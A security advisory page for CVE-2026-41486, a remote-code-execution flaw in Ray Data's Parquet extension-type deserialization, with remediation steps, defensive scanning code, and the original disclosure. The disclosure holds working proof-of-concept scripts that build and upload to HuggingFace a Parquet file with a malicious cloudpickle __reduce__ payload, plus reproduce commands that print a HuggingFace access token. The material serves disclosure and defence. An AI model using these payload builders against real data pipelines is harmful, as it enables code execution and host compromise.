CVE-2026-41486: Ray: Parquet RCE via Arrow extension deserialization

GHSA-mw35-8rx3-xf9r HIGH CISA: TRACK*
Published April 24, 2026
CISO Take

Ray Data versions 2.49.0–2.54.0 allow arbitrary code execution simply by reading a crafted Parquet file — no cluster access, credentials, or user interaction required beyond normal pipeline operation. Ray registers custom Arrow extension types globally at import that automatically invoke cloudpickle.loads() on field metadata during schema parsing, meaning a poisoned file from a data lake, HuggingFace dataset, or shared storage executes attacker code before any data row is read. With 847 downstream dependents, a top-76th-percentile EPSS score, and Ray's own documentation recommending the exact attack vector (reading HuggingFace Parquet datasets via HfFileSystem), the blast radius spans training pipelines, data ingestion workflows, and multi-tenant Ray clusters where a full end-to-end PoC has been verified. Upgrade to Ray 2.55.0 immediately; if blocked, restrict Parquet ingestion to trusted signed sources, scan existing datasets for anomalous cloudpickle magic bytes in extension metadata, and isolate worker process permissions.

Sources: GitHub Advisory, EPSS, OpenSSF, ATLAS, NVD

What is the risk?

Critical. The attack requires no authentication and no cluster membership, and it triggers automatically during routine data loading. That path falls outside the threat model in Ray's security documentation, which relies on network isolation: a fully firewalled cluster is still exposed if it reads a crafted file. The existing check_for_legacy_tensor_type() guard is ineffective for two reasons: it targets PyExtensionType rather than the currently vulnerable extension types, and it runs after schema parsing has completed, by which point the payload has already executed. Because the extension types are registered globally when ray.data is imported, every pandas.read_parquet() and pyarrow.parquet.read_table() call in the same process is affected, not just ray.data.read_parquet(). The cloudpickle-first deserialization strategy means the payload executes before the JSON fallback is ever reached. A working end-to-end PoC has been demonstrated via HuggingFace, and no release in the 2.49.0–2.54.0 range contains a fix.

How does the attack unfold?

Payload Craft
Adversary creates a valid Parquet file with a tensor column whose ARROW:extension:metadata field embeds a cloudpickle-serialized object with a malicious __reduce__ method.
AML.T0017.000
Distribution
Crafted Parquet file is uploaded to a public HuggingFace dataset, shared data lake bucket, or storage path known to be read by target Ray Data pipelines.
AML.T0019
Automatic Trigger
Ray Data worker imports ray.data (globally registering Arrow extension types), then reads the Parquet file — PyArrow calls cloudpickle.loads() on the malicious metadata during schema parsing before any row is read.
AML.T0011.000
Host Compromise
Attacker code executes as the Ray worker process user, enabling reverse shell establishment, credential theft, model exfiltration, or lateral movement throughout the cluster.
AML.T0112

What systems are affected?

| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Ray | pip | >= 2.49.0, < 2.55.0 | 2.55.0 |

42.9K · OpenSSF 5.7 · 873 dependents · Pushed 3d ago · 83% patched · ~139d to patch
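The affected range above can be checked programmatically. This is a rough sketch that assumes the installed distribution is named `ray` and that comparing only the leading MAJOR.MINOR.PATCH numbers is sufficient. The helper names are hypothetical.

```python
import re
from importlib import metadata

VULNERABLE_MIN = (2, 49, 0)  # first affected release, per the advisory
PATCHED = (2, 55, 0)         # first fixed release, per the advisory


def parse_release(version: str) -> tuple:
    """Extract leading MAJOR.MINOR.PATCH numbers; suffixes such as rc1 are ignored."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        raise ValueError(f"unrecognized version string: {version!r}")
    return tuple(int(part or 0) for part in match.groups())


def is_vulnerable(version: str) -> bool:
    """True when the version falls in >= 2.49.0, < 2.55.0."""
    return VULNERABLE_MIN <= parse_release(version) < PATCHED


def installed_ray_is_vulnerable():
    """Return True or False for the installed ray package, or None if ray is absent."""
    try:
        return is_vulnerable(metadata.version("ray"))
    except metadata.PackageNotFoundError:
        return None
```

Because suffixes are ignored, a pre-release or nightly build is classified by its base version number alone. Such builds should be checked by hand.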

Do you use Ray? You're affected.

How severe is it?

CVSS 3.1: N/A
EPSS: 0.5% chance of exploitation in 30 days (higher than 37% of all CVEs)
Exploitation Status: No known exploitation
Sophistication: Moderate

What should I do?

7 steps
  1. Upgrade ray to 2.55.0 — the fix replaces cloudpickle.loads() with json.loads() in _deserialize_with_fallback(), eliminating the unsafe deserialization path.

  2. If immediate upgrade is blocked, avoid reading Parquet files from untrusted, externally-controlled, or publicly-writable sources.

  3. In multi-tenant environments, enforce strict storage isolation to prevent cross-team Parquet file access to shared buckets.

  4. Scan existing Parquet datasets for anomalous ARROW:extension:metadata fields containing cloudpickle magic bytes (\x80\x05 header).

  5. Monitor Ray worker processes for unexpected subprocess spawns, outbound connections, or file writes during data loading phases.

  6. Audit all ray.data.read_parquet() call sites and HuggingFace dataset loading patterns in production pipelines.

  7. Apply least-privilege to Ray worker process accounts to limit blast radius if exploited.
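Step 4 can be sketched without ever unpickling anything: `pickletools.genops` walks pickle opcodes without executing them, so metadata can be classified as JSON, plain pickle, or pickle that imports or calls objects. The function names below are hypothetical. The sketch also assumes that, in a process where `ray.data` has not been imported, PyArrow leaves the `ARROW:extension:metadata` key in each field's metadata rather than deserializing it.

```python
import json
import pickletools
import sys

# Opcodes that let a pickle import, construct, or call arbitrary objects.
RISKY_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST",
    "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD",
}


def classify_extension_metadata(raw: bytes) -> str:
    """Return 'json', 'pickle', 'pickle-risky', or 'unknown' without unpickling."""
    try:
        json.loads(raw)
        return "json"
    except ValueError:  # covers JSONDecodeError and UnicodeDecodeError
        pass
    try:
        names = [opcode.name for opcode, _arg, _pos in pickletools.genops(raw)]
    except Exception:
        return "unknown"  # not a well-formed pickle stream
    if any(name in RISKY_OPCODES for name in names):
        return "pickle-risky"
    return "pickle"


def scan_parquet_schema(path):
    """List (field name, classification) for top-level fields with extension metadata."""
    if "ray.data" in sys.modules:
        # With Ray's types registered, reading the schema would itself deserialize.
        raise RuntimeError("scan from a process that has not imported ray.data")
    import pyarrow.parquet as pq  # third-party, imported lazily

    findings = []
    for field in pq.read_schema(path):
        raw = (field.metadata or {}).get(b"ARROW:extension:metadata")
        if raw is not None:
            findings.append((field.name, classify_extension_metadata(raw)))
    return findings
```

Files written by affected Ray versions presumably carry a pickled shape tuple, which would classify as `pickle`. A `pickle-risky` result means the stream references importable objects and deserves manual review. Nested fields are not inspected by this sketch.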

What does CISA's SSVC say?

Decision: Track*
Exploitation: none
Automatable: Yes
Technical Impact: total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act: Article 15 (Accuracy, robustness and cybersecurity); Article 9 (Risk management system)
ISO 42001: 6.1.2 (Information security risk assessment); 8.4 (AI system data)
NIST AI RMF: GOVERN 6.1 (AI Risk Management - Supply Chain); MANAGE 2.2 (Mechanisms to respond to identified AI risks)
OWASP LLM Top 10: LLM03 (Supply Chain Vulnerabilities)

Frequently Asked Questions

What is CVE-2026-41486?

CVE-2026-41486 is a deserialization vulnerability (CWE-502) in Ray Data versions 2.49.0 through 2.54.0. Reading a crafted Parquet file runs attacker-supplied code during schema parsing, because Ray's globally registered Arrow extension types pass field metadata to cloudpickle.loads() before any data row is read. No cluster access or credentials are required. The issue is fixed in Ray 2.55.0.

Is CVE-2026-41486 actively exploited?

No confirmed active exploitation of CVE-2026-41486 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-41486?

  1. Upgrade ray to 2.55.0. The fix replaces cloudpickle.loads() with json.loads() in _deserialize_with_fallback(), eliminating the unsafe deserialization path.
  2. If immediate upgrade is blocked, avoid reading Parquet files from untrusted, externally-controlled, or publicly-writable sources.
  3. In multi-tenant environments, enforce strict storage isolation to prevent cross-team Parquet file access to shared buckets.
  4. Scan existing Parquet datasets for anomalous ARROW:extension:metadata fields containing cloudpickle magic bytes (\x80\x05 header).
  5. Monitor Ray worker processes for unexpected subprocess spawns, outbound connections, or file writes during data loading phases.
  6. Audit all ray.data.read_parquet() call sites and HuggingFace dataset loading patterns in production pipelines.
  7. Apply least-privilege to Ray worker process accounts to limit blast radius if exploited.

What systems are affected by CVE-2026-41486?

This vulnerability affects the following AI/ML architecture patterns: Training pipelines, Data ingestion pipelines, Multi-tenant ML platforms, Distributed computing clusters, HuggingFace dataset readers.

What is the CVSS score for CVE-2026-41486?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

Training pipelines, Data ingestion pipelines, Multi-tenant ML platforms, Distributed computing clusters, HuggingFace dataset readers

MITRE ATLAS Techniques

AML.T0002.000 Datasets
AML.T0010.001 AI Software
AML.T0010.002 Data
AML.T0011.000 Unsafe AI Artifacts
AML.T0019 Publish Poisoned Datasets

Compliance Controls Affected

EU AI Act: Article 15, Article 9
ISO 42001: 6.1.2, 8.4
NIST AI RMF: GOVERN 6.1, MANAGE 2.2
OWASP LLM Top 10: LLM03

What are the technical details?

Original Advisory

# Remote Code Execution via Parquet Arrow Extension Type Deserialization

## Summary

Ray Data registers custom Arrow extension types (`ray.data.arrow_tensor`, `ray.data.arrow_tensor_v2`, `ray.data.arrow_variable_shaped_tensor`) globally in PyArrow. When PyArrow reads a Parquet file containing one of these extension types, it calls `__arrow_ext_deserialize__` on the field's metadata bytes. Ray's implementation passes these bytes directly to `cloudpickle.loads()`, achieving arbitrary code execution during schema parsing, before any row data is read.

In May 2024, Ray fixed a related vulnerability in `PyExtensionType`-based extension types ([issue #41314](https://github.com/ray-project/ray/issues/41314), [PR #45084](https://github.com/ray-project/ray/pull/45084)). In July 2025, [PR #54831](https://github.com/ray-project/ray/pull/54831) introduced `cloudpickle.loads()` into the replacement extension types' deserialization path, reintroducing the same class of vulnerability.

Note: Source links in this report are pinned to the Ray 2.54.0 release commit (`48bd1f8fa4`) for stable line references. We also re-verified the same vulnerable code paths on current `master` as of March 17, 2026.

## Details

### Extension type registration

Ray Data registers three Arrow extension types globally in PyArrow:

```python
# python/ray/data/_internal/tensor_extensions/arrow.py:1603-1605
pa.register_extension_type(ArrowTensorType((0,), pa.int64()))
pa.register_extension_type(ArrowTensorTypeV2((0,), pa.int64()))
pa.register_extension_type(ArrowVariableShapedTensorType(pa.int64(), 0))
```

Registration happens at module load time ([`__init__.py:94-95`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/__init__.py#L94-L95)), and any use of `ray.data` triggers it. Once registered, PyArrow automatically calls `__arrow_ext_deserialize__` whenever it encounters these extension type names in any Parquet file's schema, including files from untrusted sources.

### The code path to `cloudpickle.loads()`

All three extension types inherit from `ArrowExtensionSerializeDeserializeCache`, whose `__arrow_ext_deserialize__` method ([`arrow.py:176-179`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L176-L179)) delegates to subclass methods that ultimately call `_deserialize_with_fallback()`:

```python
# python/ray/data/_internal/tensor_extensions/arrow.py:84-96
def _deserialize_with_fallback(serialized: bytes, field_name: str = "data"):
    """Deserialize data with cloudpickle first, fallback to JSON."""
    try:
        # Try cloudpickle first (new format)
        return cloudpickle.loads(serialized)  # <-- arbitrary code execution
    except Exception:
        # Fallback to JSON format (legacy)
        try:
            return json.loads(serialized)
        except json.JSONDecodeError:
            raise ValueError(
                f"Unable to deserialize {field_name} from {type(serialized)}"
            )
```

The `serialized` bytes come directly from the Parquet file's field-level metadata (`ARROW:extension:metadata`) with no validation. `cloudpickle.loads()` is tried **first**, meaning a crafted payload will always be executed before the safe JSON fallback is reached.

For `ArrowTensorType`, the call chain is:

```
__arrow_ext_deserialize__(cls, storage_type, serialized)        # arrow.py:176
  -> _arrow_ext_deserialize_cache(serialized, value_type)       # arrow.py:178
    -> _arrow_ext_deserialize_compute(serialized, value_type)   # arrow.py:652
      -> _deserialize_with_fallback(serialized, "shape")        # arrow.py:653
        -> cloudpickle.loads(serialized)                        # arrow.py:88  RCE
```

`ArrowTensorTypeV2` ([`arrow.py:679-680`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L679-L680)) and `ArrowVariableShapedTensorType` ([`arrow.py:1076-1077`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/tensor_extensions/arrow.py#L1076-L1077)) follow the same pattern.

### Why the existing mitigation doesn't help

After issue [#41314](https://github.com/ray-project/ray/issues/41314), Ray added `check_for_legacy_tensor_type()` in [`parquet_datasource.py:146-170`](https://github.com/ray-project/ray/blob/48bd1f8fa4/python/ray/data/_internal/datasource/parquet_datasource.py#L146-L170) to block the old `PyExtensionType`-based tensor types:

```python
# python/ray/data/_internal/datasource/parquet_datasource.py:146-170
def check_for_legacy_tensor_type(schema):
    """Check for the legacy tensor extension type and raise an error if found.

    Ray Data uses an extension type to represent tensors in Arrow tables.
    Previously, the extension type extended `PyExtensionType`. However, this
    base type can expose users to arbitrary code execution. To prevent this,
    we don't load the type by default.
    """
    for name, type in zip(schema.names, schema.types):
        if isinstance(type, pa.UnknownExtensionType) and isinstance(
            type, pa.PyExtensionType
        ):
            raise RuntimeError(...)
```

This guard checks for `PyExtensionType` / `UnknownExtensionType`. It does **not** check for the currently-registered `ray.data.arrow_tensor` types, which are the ones that call `cloudpickle.loads()`. Additionally, the check runs after PyArrow has already deserialized the schema, so even if it checked for the current types, the code execution would have already occurred.

### Outside Ray's documented threat model

Ray's [security documentation](https://docs.ray.io/en/latest/ray-security/index.html) states that Ray relies on network isolation and "extensively uses cloudpickle." This vulnerability does not require cluster access. The payload arrives through a Parquet file from cloud storage, a data lake, HuggingFace, or a shared filesystem. A perfectly firewalled Ray cluster is vulnerable if it reads a crafted file.

## Impact

- **Affected versions**: Ray 2.49.0 through 2.54.0 (latest release as of March 2026). The vulnerable `_deserialize_with_fallback` function with `cloudpickle.loads()` was introduced in commit `f6d21db1a4` ([PR #54831](https://github.com/ray-project/ray/pull/54831), July 2025), first released in Ray 2.49.0.
- **Affected configurations**: Any process that uses Ray Data and reads Parquet files. The extension types are registered globally in PyArrow, so all Parquet reads in the process are affected, including `ray.data.read_parquet()`, `pyarrow.parquet.read_table()`, `pandas.read_parquet()`, etc.
- **Attacker prerequisites**: The attacker must place a crafted Parquet file where a Ray Data pipeline reads it. No authentication or cluster access is required. The Parquet file must contain a column with a `ray.data.arrow_tensor` (or v2, or variable-shaped) extension type name, which makes this a targeted attack against Ray Data users.
- **CIA impact**: Arbitrary command execution as the Ray worker process user, resulting in full server compromise.
- **Severity**: Critical

### Attack scenarios

1. **HuggingFace datasets**: Ray's documentation [recommends](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face) reading Parquet datasets from HuggingFace using `ray.data.read_parquet("hf://datasets/...", filesystem=HfFileSystem())`. Anyone can create a HuggingFace dataset containing a crafted Parquet file. A tensor column with `ray.data.arrow_tensor` metadata is normal for an ML dataset, as tensor columns are a core Ray Data feature. We verified this scenario end-to-end with a private HuggingFace dataset (see PoC below).
2. **Multi-tenant ML platforms**: Organizations running shared Ray clusters where multiple teams submit data processing jobs. If one team can write Parquet files to shared storage that another team reads, the writer can execute arbitrary code in the reader's context.
3. **Compromised data pipelines**: An upstream data producer writes Parquet files with crafted tensor column metadata.
The payload survives because standard Parquet tools preserve extension metadata transparently.

## PoC

We provide two reproductions: a minimal local PoC and a full end-to-end scenario via HuggingFace.

**Prerequisites:** Python 3.12+ and [uv](https://docs.astral.sh/uv/getting-started/installation/) (`curl -LsSf https://astral.sh/uv/install.sh | sh`).

### PoC 1: Local file

Creates a valid Parquet file with a tensor column whose extension metadata contains a crafted cloudpickle payload. Reading the file with Ray Data triggers code execution during schema parsing.

**1. Create the Parquet file:**

```bash
cat > craft_parquet.py << 'SCRIPT'
import cloudpickle
import pyarrow as pa
import pyarrow.parquet as pq

COMMAND = "id > /tmp/ray-tensor-rce-proof"

class Trigger:
    def __reduce__(self):
        return (eval, (f"(__import__('os').system({COMMAND!r}), (1,))[1]",))

storage_type = pa.list_(pa.int64())
schema = pa.schema([
    pa.field("tensor", storage_type, metadata={
        b"ARROW:extension:name": b"ray.data.arrow_tensor",
        b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
    }),
    pa.field("id", pa.int64()),
    pa.field("text", pa.string()),
])
table = pa.Table.from_arrays([
    pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
    pa.array([1, 2]),
    pa.array(["hello", "world"]),
], schema=schema)
pq.write_table(table, "crafted.parquet")
print("Created crafted.parquet")
SCRIPT
uv run --with 'cloudpickle,pyarrow' python craft_parquet.py
```

**2. Read it with Ray Data:**

```bash
rm -f /tmp/ray-tensor-rce-proof
uv run --with 'ray[data]' python -c "
import ray.data
ray.data.read_parquet('crafted.parquet')
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' — confirms code execution
```

### PoC 2: End-to-end via HuggingFace

This demonstrates the realistic attack scenario: a crafted Parquet file hosted as a HuggingFace dataset, read by a Ray cluster following [Ray's own documentation](https://docs.ray.io/en/latest/data/loading-data.html#reading-files-from-hugging-face).
We uploaded a crafted Parquet file to a private HuggingFace dataset at [`antiproof/parquet-tensor-disclosure`](https://huggingface.co/datasets/antiproof/parquet-tensor-disclosure). The file looks like a normal ML dataset with tensor, id, and text columns. The read-only token below gives access.

**Upload script** (for reference, this is how we seeded the dataset):

```bash
cat > upload_dataset.py << 'SCRIPT'
# /// script
# requires-python = ">=3.10"
# dependencies = ["cloudpickle", "pyarrow", "huggingface_hub"]
# ///
"""Upload a crafted Parquet file to a HuggingFace dataset.

Prerequisites: huggingface-cli login (with a write token)
Usage: uv run upload_dataset.py <repo_id> <command>
"""
import sys, tempfile
from pathlib import Path

import cloudpickle, pyarrow as pa, pyarrow.parquet as pq
from huggingface_hub import HfApi


def build_parquet(output, command):
    class Trigger:
        def __reduce__(self):
            return (eval, (f"(__import__('os').system({command!r}), (1,))[1]",))

    storage_type = pa.list_(pa.int64())
    schema = pa.schema([
        pa.field("tensor", storage_type, metadata={
            b"ARROW:extension:name": b"ray.data.arrow_tensor",
            b"ARROW:extension:metadata": cloudpickle.dumps(Trigger()),
        }),
        pa.field("id", pa.int64()),
        pa.field("text", pa.string()),
    ])
    table = pa.Table.from_arrays([
        pa.array([[1, 2, 3], [4, 5, 6]], type=storage_type),
        pa.array([1, 2]),
        pa.array(["hello", "world"]),
    ], schema=schema)
    pq.write_table(table, str(output))


repo_id, command = sys.argv[1], sys.argv[2]
with tempfile.TemporaryDirectory() as tmpdir:
    parquet = Path(tmpdir) / "train.parquet"
    build_parquet(parquet, command)
    HfApi().upload_file(
        path_or_fileobj=str(parquet),
        path_in_repo="data/train.parquet",
        repo_id=repo_id,
        repo_type="dataset",
    )
print(f"Uploaded to https://huggingface.co/datasets/{repo_id}")
SCRIPT
# We ran:
# uv run upload_dataset.py antiproof/parquet-tensor-disclosure 'id > /tmp/ray-tensor-rce-proof'
```

**Reproduce** (reads the dataset from HuggingFace, no local files needed):

```bash
rm -f /tmp/ray-tensor-rce-proof
HF_TOKEN=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 \
uv run --with 'ray[data],huggingface_hub' python -c "
import ray.data
from huggingface_hub import HfFileSystem
ray.data.read_parquet(
    'hf://datasets/antiproof/parquet-tensor-disclosure/data/train.parquet',
    filesystem=HfFileSystem(),
)
"
cat /tmp/ray-tensor-rce-proof
# Expected: output of 'id' — confirms code execution via HuggingFace dataset
```

The token above is read-only. The dataset is private to prevent unintended exposure.

## Suggested fix

The extension metadata stores simple values (a shape tuple like `(3, 224, 224)` or an ndim integer). These do not require cloudpickle.

1. **Replace `cloudpickle.loads()` in `_deserialize_with_fallback()` with `json.loads()`.** The tensor shape and ndim are JSON-serializable. For backward compatibility with files written using the current cloudpickle format, gate `cloudpickle.loads()` behind an opt-in environment variable (following the pattern already established with `RAY_DATA_AUTOLOAD_PYEXTENSIONTYPE`).
2. **Serialize new extension type metadata as JSON by default.** `json.dumps([3, 224, 224])` carries the same information as `cloudpickle.dumps((3, 224, 224))`, without the code execution risk.
3. **Add a security note to `read_parquet()` documentation** explaining that Parquet files from untrusted sources can execute arbitrary code when tensor extension types are registered.

Please contact security@antiproof.ai with any questions about this disclosure policy or related security research.
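The following sketch is not part of the original advisory and is not Ray's actual patch. It illustrates what a JSON-only parser for the shape case of the suggested fix might look like. The function name `deserialize_shape` and the `MAX_DIMS` limit are hypothetical, and the ndim integer used by variable-shaped tensors is not handled.

```python
import json

MAX_DIMS = 32  # hypothetical sanity limit, not taken from Ray


def deserialize_shape(serialized: bytes) -> tuple:
    """Parse tensor-shape metadata as JSON only; never fall back to pickle."""
    try:
        value = json.loads(serialized)
    except ValueError as exc:  # JSONDecodeError and UnicodeDecodeError
        raise ValueError("extension metadata is not valid JSON") from exc
    if not isinstance(value, list) or len(value) > MAX_DIMS:
        raise ValueError("shape must be a JSON array of bounded length")
    for dim in value:
        # bool is a subclass of int, so it is rejected explicitly.
        if isinstance(dim, bool) or not isinstance(dim, int) or dim < 0:
            raise ValueError(f"invalid dimension: {dim!r}")
    return tuple(value)
```

Validating the decoded value after parsing, rather than trusting whatever the decoder returns, follows the CWE-502 guidance to populate a new object from checked fields.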

Exploitation Scenario

An adversary registers a free HuggingFace account and uploads a Parquet file crafted to look like a legitimate ML tensor dataset — normal tensor, id, and text columns. The tensor column's ARROW:extension:metadata contains a cloudpickle-serialized Python object whose __reduce__ method executes a reverse shell command. Standard Parquet inspection tools (parquet-tools, DuckDB) display the file as normal because they ignore extension metadata. A victim data engineer, following Ray's own documented pattern for loading HuggingFace datasets, runs ray.data.read_parquet('hf://datasets/attacker/dataset', filesystem=HfFileSystem()). The moment PyArrow parses the Parquet schema, it calls __arrow_ext_deserialize__ on the registered ray.data.arrow_tensor type, which calls _deserialize_with_fallback(), which calls cloudpickle.loads() — executing the reverse shell as the Ray worker user and granting full host access before a single data row is processed.

Weaknesses (CWE)

CWE-502 — Deserialization of Untrusted Data: The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.

  • [Architecture and Design, Implementation] If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
  • [Implementation] When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
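The HMAC suggestion above can be applied at the file level, before a Parquet file ever reaches a reader. This is a minimal sketch assuming the producer and consumer share a secret key and exchange the tag out of band. The function names are hypothetical, and key distribution and rotation are not covered.

```python
import hashlib
import hmac


def sign_file(path, key: bytes) -> str:
    """Compute an HMAC-SHA256 tag over the file contents, reading in 1 MiB chunks."""
    digest = hmac.new(key, digestmod=hashlib.sha256)
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_file(path, key: bytes, expected_tag: str) -> bool:
    """Return True only if the file's tag matches, using a constant-time comparison."""
    return hmac.compare_digest(sign_file(path, key), expected_tag)
```

A pipeline would call `verify_file()` and refuse to open the file on a mismatch. The check has to run before any Parquet reader touches the file, since the code execution described in this advisory happens during schema parsing.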

Source: MITRE CWE corpus.

Timeline

Published: April 24, 2026
Last Modified: April 24, 2026
First Seen: April 24, 2026

Related Vulnerabilities